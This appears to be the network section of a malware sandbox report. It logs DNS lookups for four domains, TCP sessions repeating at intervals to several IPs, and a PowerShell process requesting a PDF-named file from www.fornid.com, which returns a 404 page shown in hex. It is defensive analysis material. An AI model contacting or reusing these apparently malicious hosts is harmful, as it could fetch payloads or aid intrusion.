Dec 5, 2024 10:39:30.993503094 CET  443          49734      91.193.42.13   192.168.2.11
Dec 5, 2024 10:39:31.037827969 CET  49734        443        192.168.2.11   91.193.42.13
Dec 5, 2024 10:39:31.037842035 CET  443          49734      91.193.42.13   192.168.2.11
Dec 5, 2024 10:39:31.084614992 CET  49734        443        192.168.2.11   91.193.42.13
Dec 5, 2024 10:39:31.113302946 CET  443          49734      91.193.42.13   192.168.2.11
Dec 5, 2024 10:39:31.113312960 CET  443          49734      91.193.42.13   192.168.2.11
Dec 5, 2024 10:39:31.113332987 CET  443          49734      91.193.42.13   192.168.2.11
Dec 5, 2024 10:39:31.113341093 CET  443          49734      91.193.42.13   192.168.2.11
Dec 5, 2024 10:39:31.113353014 CET  443          49734      91.193.42.13   192.168.2.11
Dec 5, 2024 10:39:31.113387108 CET  49734        443        192.168.2.11   91.193.42.13
Dec 5, 2024 10:39:31.113394022 CET  443          49734      91.193.42.13   192.168.2.11
Dec 5, 2024 10:39:31.113439083 CET  49734        443        192.168.2.11   91.193.42.13
Dec 5, 2024 10:39:31.162790060 CET  49734        443        192.168.2.11   91.193.42.13
Dec 5, 2024 10:39:31.213444948 CET  443          49734      91.193.42.13   192.168.2.11
Dec 5, 2024 10:39:31.213454962 CET  443          49734      91.193.42.13   192.168.2.11
Dec 5, 2024 10:39:31.213474989 CET  443          49734      91.193.42.13   192.168.2.11
Dec 5, 2024 10:39:31.213486910 CET  443          49734      91.193.42.13   192.168.2.11
Dec 5, 2024 10:39:31.213557959 CET  443          49734      91.193.42.13   192.168.2.11
Dec 5, 2024 10:39:31.213561058 CET  49734        443        192.168.2.11   91.193.42.13
Dec 5, 2024 10:39:31.213577032 CET  443          49734      91.193.42.13   192.168.2.11
Dec 5, 2024 10:39:31.213660955 CET  49734        443        192.168.2.11   91.193.42.13
Dec 5, 2024 10:39:31.213660955 CET  49734        443        192.168.2.11   91.193.42.13
                                                                            Dec 5, 2024 10:39:31.213660955 CET49734443192.168.2.1191.193.42.13
                                                                            Dec 5, 2024 10:39:31.220335007 CET49734443192.168.2.1191.193.42.13
                                                                            Dec 5, 2024 10:39:33.422503948 CET49748443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:39:33.422554970 CET44349748184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:39:33.422775984 CET49748443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:39:33.425164938 CET49748443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:39:33.425193071 CET44349748184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:39:34.694987059 CET44349748184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:39:34.695049047 CET49748443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:39:34.697315931 CET49748443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:39:34.697329998 CET44349748184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:39:34.697597027 CET44349748184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:39:34.705569029 CET49748443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:39:34.751334906 CET44349748184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:39:35.149703979 CET44349748184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:39:35.149769068 CET44349748184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:39:35.149889946 CET49748443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:39:35.152149916 CET49748443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:39:39.335696936 CET49765443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:39:39.335747004 CET44349765184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:39:39.335839987 CET49765443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:39:39.336117029 CET49765443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:39:39.336133003 CET44349765184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:39:40.711389065 CET44349765184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:39:40.720885992 CET49765443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:39:40.720913887 CET44349765184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:39:41.171524048 CET44349765184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:39:41.171606064 CET44349765184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:39:41.175606012 CET49765443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:39:41.181631088 CET49765443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:39:45.432370901 CET49777443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:39:45.432401896 CET44349777148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:39:45.432492018 CET49777443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:39:45.432863951 CET49777443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:39:45.432878971 CET44349777148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:39:46.839571953 CET44349777148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:39:46.839684963 CET49777443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:39:46.868912935 CET49777443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:39:46.868943930 CET44349777148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:39:46.869347095 CET44349777148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:39:46.875905991 CET49777443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:39:46.919332981 CET44349777148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:39:47.380382061 CET44349777148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:39:47.382793903 CET44349777148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:39:47.382849932 CET49777443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:39:47.383253098 CET49777443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:39:51.384538889 CET49792443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:39:51.384562969 CET44349792184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:39:51.384711981 CET49792443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:39:51.384867907 CET49792443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:39:51.384879112 CET44349792184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:39:52.645436049 CET44349792184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:39:52.646742105 CET49792443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:39:52.646750927 CET44349792184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:39:53.106416941 CET44349792184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:39:53.106502056 CET44349792184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:39:53.106539965 CET49792443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:39:53.106935024 CET49792443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:39:57.120358944 CET49806443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:39:57.120397091 CET44349806148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:39:57.120553970 CET49806443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:39:57.120758057 CET49806443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:39:57.120770931 CET44349806148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:39:58.519005060 CET44349806148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:39:58.520168066 CET49806443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:39:58.520184040 CET44349806148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:39:59.063574076 CET44349806148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:39:59.063740969 CET44349806148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:39:59.063823938 CET49806443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:39:59.064109087 CET49806443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:03.075124979 CET49822443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:03.075164080 CET44349822184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:03.075236082 CET49822443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:03.075421095 CET49822443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:03.075434923 CET44349822184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:04.342302084 CET44349822184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:04.343580008 CET49822443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:04.343590021 CET44349822184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:04.802196026 CET44349822184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:04.802269936 CET44349822184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:04.802329063 CET49822443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:04.802777052 CET49822443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:08.806384087 CET49834443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:08.806411028 CET44349834148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:08.806586981 CET49834443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:08.806699038 CET49834443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:08.806718111 CET44349834148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:10.206360102 CET44349834148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:10.207336903 CET49834443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:10.207371950 CET44349834148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:10.753434896 CET44349834148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:10.753622055 CET44349834148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:10.753940105 CET49834443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:10.754333019 CET49834443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:14.775249004 CET49851443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:14.775299072 CET44349851184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:14.775382996 CET49851443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:14.775667906 CET49851443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:14.775677919 CET44349851184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:16.036945105 CET44349851184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:16.053776979 CET49851443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:16.053824902 CET44349851184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:16.498760939 CET44349851184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:16.498826981 CET44349851184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:16.498893976 CET49851443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:16.499212027 CET49851443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:20.509367943 CET49866443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:20.509388924 CET44349866148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:20.509474993 CET49866443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:20.509665012 CET49866443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:20.509677887 CET44349866148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:22.100955009 CET44349866148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:22.102349043 CET49866443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:22.102368116 CET44349866148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:22.648117065 CET44349866148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:22.648288965 CET44349866148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:22.648386955 CET49866443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:22.649305105 CET49866443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:26.665520906 CET49879443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:26.665560007 CET44349879184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:26.665647030 CET49879443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:26.665828943 CET49879443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:26.665842056 CET44349879184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:28.121464968 CET44349879184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:28.122736931 CET49879443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:28.122785091 CET44349879184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:28.581470966 CET44349879184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:28.581557035 CET44349879184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:28.581666946 CET49879443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:28.582199097 CET49879443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:32.603773117 CET49894443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:32.603816986 CET44349894148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:32.603939056 CET49894443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:32.604188919 CET49894443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:32.604203939 CET44349894148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:34.004509926 CET44349894148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:34.005827904 CET49894443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:34.005842924 CET44349894148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:34.550637007 CET44349894148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:34.550875902 CET44349894148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:34.550955057 CET49894443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:34.554903984 CET49894443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:38.697640896 CET49907443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:38.697701931 CET44349907184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:38.697843075 CET49907443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:38.698045969 CET49907443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:38.698061943 CET44349907184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:39.984884024 CET44349907184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:39.985949039 CET49907443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:39.985982895 CET44349907184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:40.447077036 CET44349907184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:40.447175980 CET44349907184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:40.447251081 CET49907443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:40.447666883 CET49907443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:44.463191032 CET49920443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:44.463253021 CET44349920148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:44.463352919 CET49920443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:44.463602066 CET49920443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:44.463617086 CET44349920148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:45.861239910 CET44349920148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:45.864774942 CET49920443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:45.864806890 CET44349920148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:46.406579971 CET44349920148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:46.406740904 CET44349920148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:46.406843901 CET49920443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:46.407392025 CET49920443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:50.462621927 CET49929443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:50.462673903 CET44349929184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:50.462766886 CET49929443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:50.463021040 CET49929443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:50.463035107 CET44349929184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:51.724647045 CET44349929184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:51.727770090 CET49929443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:51.727787971 CET44349929184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:52.184900999 CET44349929184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:52.185000896 CET44349929184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:52.185076952 CET49929443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:52.185522079 CET49929443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:56.182432890 CET49942443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:56.182475090 CET44349942148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:56.182635069 CET49942443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:56.182852983 CET49942443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:56.182868004 CET44349942148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:57.591888905 CET44349942148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:57.593225956 CET49942443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:57.593245029 CET44349942148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:58.175519943 CET44349942148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:58.175714016 CET44349942148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:58.178455114 CET49942443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:58.178987026 CET49942443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:41:02.182046890 CET49958443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:41:02.182079077 CET44349958184.171.244.231192.168.2.11
Dec 5, 2024 10:41:02.182260036 CET | 49958 | 443 | 192.168.2.11 | 184.171.244.231
Dec 5, 2024 10:41:02.182574034 CET | 49958 | 443 | 192.168.2.11 | 184.171.244.231
Dec 5, 2024 10:41:02.182588100 CET | 443 | 49958 | 184.171.244.231 | 192.168.2.11
Dec 5, 2024 10:41:03.444715977 CET | 443 | 49958 | 184.171.244.231 | 192.168.2.11
Dec 5, 2024 10:41:03.446155071 CET | 49958 | 443 | 192.168.2.11 | 184.171.244.231
Dec 5, 2024 10:41:03.446177959 CET | 443 | 49958 | 184.171.244.231 | 192.168.2.11
Dec 5, 2024 10:41:03.909410954 CET | 443 | 49958 | 184.171.244.231 | 192.168.2.11
Dec 5, 2024 10:41:03.909481049 CET | 443 | 49958 | 184.171.244.231 | 192.168.2.11
Dec 5, 2024 10:41:03.909827948 CET | 49958 | 443 | 192.168.2.11 | 184.171.244.231
Dec 5, 2024 10:41:03.910105944 CET | 49958 | 443 | 192.168.2.11 | 184.171.244.231
Dec 5, 2024 10:41:07.931598902 CET | 49971 | 443 | 192.168.2.11 | 148.251.114.233
Dec 5, 2024 10:41:07.931646109 CET | 443 | 49971 | 148.251.114.233 | 192.168.2.11
Dec 5, 2024 10:41:07.933799028 CET | 49971 | 443 | 192.168.2.11 | 148.251.114.233
Dec 5, 2024 10:41:07.934005976 CET | 49971 | 443 | 192.168.2.11 | 148.251.114.233
Dec 5, 2024 10:41:07.934016943 CET | 443 | 49971 | 148.251.114.233 | 192.168.2.11
Dec 5, 2024 10:41:09.332838058 CET | 443 | 49971 | 148.251.114.233 | 192.168.2.11
Dec 5, 2024 10:41:09.334644079 CET | 49971 | 443 | 192.168.2.11 | 148.251.114.233
Dec 5, 2024 10:41:09.334662914 CET | 443 | 49971 | 148.251.114.233 | 192.168.2.11
Dec 5, 2024 10:41:09.879982948 CET | 443 | 49971 | 148.251.114.233 | 192.168.2.11
Dec 5, 2024 10:41:09.880167007 CET | 443 | 49971 | 148.251.114.233 | 192.168.2.11
Dec 5, 2024 10:41:09.880562067 CET | 49971 | 443 | 192.168.2.11 | 148.251.114.233
Dec 5, 2024 10:41:09.883703947 CET | 49971 | 443 | 192.168.2.11 | 148.251.114.233
Dec 5, 2024 10:41:13.900430918 CET | 49986 | 443 | 192.168.2.11 | 184.171.244.231
Dec 5, 2024 10:41:13.900470018 CET | 443 | 49986 | 184.171.244.231 | 192.168.2.11
Dec 5, 2024 10:41:13.900923967 CET | 49986 | 443 | 192.168.2.11 | 184.171.244.231
Dec 5, 2024 10:41:13.901266098 CET | 49986 | 443 | 192.168.2.11 | 184.171.244.231
Dec 5, 2024 10:41:13.901278973 CET | 443 | 49986 | 184.171.244.231 | 192.168.2.11
Dec 5, 2024 10:41:15.166930914 CET | 443 | 49986 | 184.171.244.231 | 192.168.2.11
Dec 5, 2024 10:41:15.168108940 CET | 49986 | 443 | 192.168.2.11 | 184.171.244.231
Dec 5, 2024 10:41:15.168129921 CET | 443 | 49986 | 184.171.244.231 | 192.168.2.11
Dec 5, 2024 10:41:15.630806923 CET | 443 | 49986 | 184.171.244.231 | 192.168.2.11
Dec 5, 2024 10:41:15.630891085 CET | 443 | 49986 | 184.171.244.231 | 192.168.2.11
Dec 5, 2024 10:41:15.634392977 CET | 49986 | 443 | 192.168.2.11 | 184.171.244.231
Dec 5, 2024 10:41:15.639708996 CET | 49986 | 443 | 192.168.2.11 | 184.171.244.231
Dec 5, 2024 10:41:19.635267019 CET | 49994 | 443 | 192.168.2.11 | 148.251.114.233
Dec 5, 2024 10:41:19.635329962 CET | 443 | 49994 | 148.251.114.233 | 192.168.2.11
Dec 5, 2024 10:41:19.635420084 CET | 49994 | 443 | 192.168.2.11 | 148.251.114.233
Dec 5, 2024 10:41:19.635689974 CET | 49994 | 443 | 192.168.2.11 | 148.251.114.233
Dec 5, 2024 10:41:19.635699987 CET | 443 | 49994 | 148.251.114.233 | 192.168.2.11
Dec 5, 2024 10:41:21.036128998 CET | 443 | 49994 | 148.251.114.233 | 192.168.2.11
Dec 5, 2024 10:41:21.037813902 CET | 49994 | 443 | 192.168.2.11 | 148.251.114.233
Dec 5, 2024 10:41:21.037832975 CET | 443 | 49994 | 148.251.114.233 | 192.168.2.11
Dec 5, 2024 10:41:21.582751036 CET | 443 | 49994 | 148.251.114.233 | 192.168.2.11
Dec 5, 2024 10:41:21.582926989 CET | 443 | 49994 | 148.251.114.233 | 192.168.2.11
Dec 5, 2024 10:41:21.582973957 CET | 49994 | 443 | 192.168.2.11 | 148.251.114.233
Dec 5, 2024 10:41:33.640898943 CET | 49994 | 443 | 192.168.2.11 | 148.251.114.233
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 5, 2024 10:39:25.936517954 CET | 53717 | 53 | 192.168.2.11 | 1.1.1.1
Dec 5, 2024 10:39:26.078234911 CET | 53 | 53717 | 1.1.1.1 | 192.168.2.11
Dec 5, 2024 10:39:28.942476988 CET | 59702 | 53 | 192.168.2.11 | 1.1.1.1
Dec 5, 2024 10:39:29.080564976 CET | 53 | 59702 | 1.1.1.1 | 192.168.2.11
Dec 5, 2024 10:39:33.274240017 CET | 51009 | 53 | 192.168.2.11 | 1.1.1.1
Dec 5, 2024 10:39:33.412281990 CET | 53 | 51009 | 1.1.1.1 | 192.168.2.11
Dec 5, 2024 10:39:45.291163921 CET | 61893 | 53 | 192.168.2.11 | 1.1.1.1
Dec 5, 2024 10:39:45.428780079 CET | 53 | 61893 | 1.1.1.1 | 192.168.2.11
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 5, 2024 10:39:25.936517954 CET | 192.168.2.11 | 1.1.1.1 | 0x6c63 | Standard query (0) | www.fornid.com | A (IP address) | IN (0x0001) | false
Dec 5, 2024 10:39:28.942476988 CET | 192.168.2.11 | 1.1.1.1 | 0xa720 | Standard query (0) | www.pineappletech.ae | A (IP address) | IN (0x0001) | false
Dec 5, 2024 10:39:33.274240017 CET | 192.168.2.11 | 1.1.1.1 | 0x206c | Standard query (0) | www.almrwad.com | A (IP address) | IN (0x0001) | false
Dec 5, 2024 10:39:45.291163921 CET | 192.168.2.11 | 1.1.1.1 | 0xd4f1 | Standard query (0) | www.erp-royal-crown.info | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 5, 2024 10:39:26.078234911 CET | 1.1.1.1 | 192.168.2.11 | 0x6c63 | No error (0) | www.fornid.com | fornid.com | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 5, 2024 10:39:26.078234911 CET | 1.1.1.1 | 192.168.2.11 | 0x6c63 | No error (0) | fornid.com | - | 93.95.216.175 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 10:39:29.080564976 CET | 1.1.1.1 | 192.168.2.11 | 0xa720 | No error (0) | www.pineappletech.ae | - | 91.193.42.13 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 10:39:33.412281990 CET | 1.1.1.1 | 192.168.2.11 | 0x206c | No error (0) | www.almrwad.com | almrwad.com | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 5, 2024 10:39:33.412281990 CET | 1.1.1.1 | 192.168.2.11 | 0x206c | No error (0) | almrwad.com | - | 184.171.244.231 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 10:39:45.428780079 CET | 1.1.1.1 | 192.168.2.11 | 0xd4f1 | No error (0) | www.erp-royal-crown.info | erp-royal-crown.info | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 5, 2024 10:39:45.428780079 CET | 1.1.1.1 | 192.168.2.11 | 0xd4f1 | No error (0) | erp-royal-crown.info | - | 148.251.114.233 | A (IP address) | IN (0x0001) | false
                                                                            • www.fornid.com
                                                                            • www.pineappletech.ae
                                                                            • www.almrwad.com
                                                                            • www.erp-royal-crown.info
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.11 | 49728 | 93.95.216.175 | 443 | 7700 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:39:27 UTC | 116 | OUT | GET /wh/List%20of%20required%20items%20and%20services.pdf HTTP/1.1
                                                                            Host: www.fornid.com
                                                                            Connection: Keep-Alive
2024-12-05 09:39:28 UTC | 549 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Thu, 05 Dec 2024 09:39:27 GMT
                                                                            Server: Apache
                                                                            P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
                                                                            Set-Cookie: PrestaShop-a30a9934ef476d11b6cc3c983616e364=rMDVJJyqzbUxb1uFCvyisk3G4cITOWZG4GuazMsJ3UP4fxnTX%2FMSpEfZIoqrX%2BXqP6DO2Fqc%2BBFZkXxuDpMJZAgCA9dZBWoLjZLevxRYylY%3D000075; expires=Wed, 25-Dec-2024 09:39:27 GMT; Max-Age=1727999; path=/; domain=www.fornid.com; httponly
                                                                            Upgrade: h2,h2c
                                                                            Connection: Upgrade, close
                                                                            Vary: Accept-Encoding
                                                                            Transfer-Encoding: chunked
                                                                            Content-Type: text/html; charset=utf-8
                                                                            2024-12-05 09:39:28 UTC7643INData Raw: 31 31 65 35 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 6c 74 2d 69 65 39 20 6c 74 2d 69 65 38 20 6c 74 2d 69 65 37 20 22 20 6c 61 6e 67 3d 22 69 74 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 6c 74 2d 69 65 39 20 6c 74 2d 69 65 38 20 69 65 37 22 20 6c 61 6e 67 3d 22 69 74 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 6c 74 2d 69 65 39 20 69 65 38 22 20 6c 61 6e 67 3d 22 69 74 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69
